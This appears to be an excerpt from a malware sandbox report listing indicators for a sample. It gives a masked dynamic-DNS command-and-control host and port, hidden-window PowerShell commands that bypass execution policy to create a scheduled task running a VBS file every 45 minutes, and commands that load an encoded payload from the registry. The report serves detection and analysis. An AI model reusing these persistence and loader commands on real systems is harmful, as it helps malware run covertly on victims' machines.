Technical Information
- <SYSTEM32>\tasks\test
- 'jh#####n4842.ddns.net':5552
- DNS ASK jh#####n4842.ddns.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "schtasks /create /sc minute /mo 45 /tn test /tr '<PATH_SAMPLE>.vbs'"' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'Microsoft').Microsoft;$_b=$_b.replace('@','@');[byte[]]$_0 = [System.Conve...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "schtasks /create /sc minute /mo 45 /tn test /tr '<PATH_SAMPLE>.vbs'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'Microsoft').Microsoft;$_b=$_b.replace('@','@');[byte[]]$_0 = [System.Conve...
- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 45 /tn test /tr <PATH_SAMPLE>.vbs